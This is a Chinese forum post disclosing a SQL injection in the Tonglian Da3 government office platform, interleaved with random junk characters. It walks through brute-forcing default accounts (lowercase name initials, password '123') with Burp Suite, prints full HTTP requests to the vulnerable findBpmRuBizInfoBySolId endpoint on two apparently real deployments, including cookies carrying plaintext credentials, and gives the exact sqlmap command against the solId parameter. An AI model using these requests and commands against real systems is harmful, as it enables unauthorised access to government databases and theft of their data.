同联Da3协同办公平台前台通用sql injection漏洞

admin · 发表于 2018-10-20 20:15:17

$ C" \6 i; h# _" z y3 C. l( A( y: u
+ P- F1 O7 ]% u8 L m

2 L1 t" k$ _2 F% A7 O7 K5 n) C 平台简介： 0 f i: a2 D; A _

& j9 ^" F1 Q* w0 y* V j5 i; Y# m# {0 t; ~2 `

& a h4 T! v6 P# ~ 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' }9 n+ N" j$ r+ ^6 F! I; _ 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' ]/ Q7 z T5 R' Q6 f0 K同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！ 8 c# r$ [) G: b$ }

; f1 v2 X9 s" K6 C6 s. C 2 L3 A1 i9 D- |+ E+ M T

! l6 `7 U. j. b5 a& e$ E0 O/ \ 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址： , S3 c* U7 p% d! T5 X8 l

: f$ i5 R3 F) a& `3 V ) T0 |9 i9 T2 {

+ [! R% |2 \: K; h) v" K6 K http://1.1.1.1:7197/cap-aco/#（案例2-）; e# H1 o) x* S2 Z x4 v% n6 q3 p

# S7 `0 X; X$ ^ http://www.XXOO.com （案例1-官网网站） 6 J( l3 Q% g* v7 y4 h& K

; m! U: x5 |( w( D5 p% _2 V7 S: O - P$ m' i$ \7 O) z; k; M. P3 M

8 b$ _& D: F' ~: k/ n0 n- q 漏洞详情: 4 P& c- L, Z' Z9 b* _+ t) \# _" j1 C

& @: J( p, H7 I* E# S: P 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试 ! a) }2 l7 R5 ~) X

I2 |, l9 |7 r, C( e' p X& W 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图：1 z3 J" r7 }# [5 K! ^+ u

. d. ]9 S! C) q8 {# t! b8 Y* O ) f& h1 j" U9 L9 \

! t; A+ b" A7 l5 P( }" g% E6 G; A, Y6 l ) \" S; x g r( P* D. h6 u7 B/ W

3 s- g, K2 B& L status为302即表示破解成功，然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包，抓包的数据分别如下： 8 J9 P) H/ H3 Y4 M5 G5 }

! [9 O$ D" ~; W5 v( W 1、案例1-官方网站 . P ]5 T& q8 M. N: s6 g

3 h t6 s# Q- l' t1 M4 N s GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 $ Y+ ~2 h0 |" L% z7 C* C5 ]

; Y9 h' \3 R% B; H1 d( z Host: www.XXOO.com* d0 b! r Z) C$ N# x% m+ q

- m Q. |* {5 k7 M Proxy-Connection: Keep-Alive! Q6 B) I7 ]. v, T4 ]

8 W s3 x: _# p7 s1 d% l2 f Accept: application/json, text/javascript, */*; q=0.014 ?8 g* \# O2 Q4 V7 ?

( Y+ o; F' s5 i Accept-Language: zh-CN- m6 P' l. h9 h% Y3 F- H e

; w P) y, i5 D. ~3 v' w( t Content-Type: application/json " i8 C. p9 T. r" V1 O

; Y' h. B+ j/ I$ C6 E5 e User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko : x; n) g. a" ]- y# F9 {( g- N

0 E% S; z6 J( Z& Q, o" U4 @1 g: J X-Requested-With: XMLHttpRequest " e) |" P- P% u9 p

" j b! O& Q2 a2 u Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0023 g9 ?7 w, p# v' N1 ?

+ z. G S4 ~+ _: l5 J; P Accept-Encoding: gzip, deflate, sdch : F. ?) O# K9 {5 A: a

8 i4 b: @7 p9 w; p& K Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e: M8 b" R+ \2 l; A

+ G# X- g& E X0 C 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:) E3 ^& e0 s( U5 \* D

) |0 q5 {7 e0 E! | / q& V( x; M5 R$ a3 W+ V

2 ?/ u% j f, T9 d1 ] + c" w7 u* n4 k. K. u

5 M3 ~+ G4 F+ I) {& ~ + U0 _9 @, m+ a" I. ]3 } r

+ z5 [& S* m, Z+ e, X, I5 N " q J5 E8 p7 d% {- f

1 T% u. o& v$ w. c' P # w: e4 e+ j. H3 ^

* ]9 @/ u+ A6 r' g0 E1 f; Z) l 2、案例2-某天河云平台 2 k6 G2 w0 @9 P- |) \

: g# [$ d$ `' r2 f- d GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.18 ]; A! P* B/ |) P" {: {

% F0 g4 l! f# S. J% ]) f9 Z4 D Host: 1.1.1.:7197 , M" ^) z( }3 g/ p/ B3 O7 P7 H

+ C& i7 ~) \5 \/ p/ H/ c) e7 D Accept: application/json, text/javascript, */*; q=0.01 - X4 }* {: p. j9 X4 I

6 ~7 O J W: |9 X: j5 u3 m$ Q X-Requested-With: XMLHttpRequest# x, O u7 T5 i$ n8 d/ s

* z+ X- Z8 X l* |7 S5 S7 v, _ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 . B8 x: E" M' U2 ~2 B

0 y* ]" h' ?$ b/ F- ]' P& {. G Content-Type: application/json$ y( K6 ]0 ?% z" G0 N+ D

/ A; X/ v& s5 t4 E Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 1 [' V% j9 T6 r4 c3 d2 P

d1 u% B+ i, s4 O3 S# ?7 F. i/ V Accept-Language: zh-CN,zh;q=0.8. N! V" `( g0 c! k* [4 t- Z

$ ^ Y& S6 I& G, |% V6 K1 n Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1' H4 V% R! B6 J7 \7 y) |

1 H' H, V9 t! W+ n& h6 Z Connection: close R8 l' }' u& j2 [+ O

. w, T& e# ^. J# g- Z$ f! ]9 ?! I0 f 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为：sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* w- b4 F$ O @/ q

) N+ W- M8 B& w( i# I: G + R u J) w& Z

' J/ J- z5 c' G' S* ^
7 \ D; t+ ?. e: ~1 v) x/ {, U8 l& y

		自动登录	找回密码
密码			立即注册